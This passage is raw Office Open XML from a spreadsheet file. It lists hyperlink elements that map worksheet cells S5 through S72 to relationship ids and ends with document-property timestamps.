    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S5" r:id="rId4"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S6" r:id="rId5"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S7" r:id="rId6"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S8" r:id="rId7"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S9" r:id="rId8"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S10" r:id="rId9"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S11" r:id="rId10"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S12" r:id="rId11"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S13" r:id="rId12"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S14" r:id="rId13"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S15" r:id="rId14"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S16" r:id="rId15"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S17" r:id="rId16"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S18" r:id="rId17"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S19" r:id="rId18"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S20" r:id="rId19"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S21" r:id="rId20"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S22" r:id="rId21"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S23" r:id="rId22"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S24" r:id="rId23"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S25" r:id="rId24"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S26" r:id="rId25"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S27" r:id="rId26"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S28" r:id="rId27"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S29" r:id="rId28"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S30" r:id="rId29"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S31" r:id="rId30"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S32" r:id="rId31"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S33" r:id="rId32"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S34" r:id="rId33"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S35" r:id="rId34"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S36" r:id="rId35"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S37" r:id="rId36"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S38" r:id="rId37"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S39" r:id="rId38"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S40" r:id="rId39"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S41" r:id="rId40"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S42" r:id="rId41"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S43" r:id="rId42"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S44" r:id="rId43"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S45" r:id="rId44"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S46" r:id="rId45"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S47" r:id="rId46"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S48" r:id="rId47"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S49" r:id="rId48"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S50" r:id="rId49"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S51" r:id="rId50"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S52" r:id="rId51"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S53" r:id="rId52"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S54" r:id="rId53"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S55" r:id="rId54"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S56" r:id="rId55"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S57" r:id="rId56"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S58" r:id="rId57"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S59" r:id="rId58"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S60" r:id="rId59"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S61" r:id="rId60"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S62" r:id="rId61"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S63" r:id="rId62"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S64" r:id="rId63"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S65" r:id="rId64"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S66" r:id="rId65"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S67" r:id="rId66"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S68" r:id="rId67"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S69" r:id="rId68"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S70" r:id="rId69"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S71" r:id="rId70"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S72" r:id="rId7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2026-09-17T10:06:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-17T10:06:43Z</dcterms:modified>
</cp:coreProperties>
</file>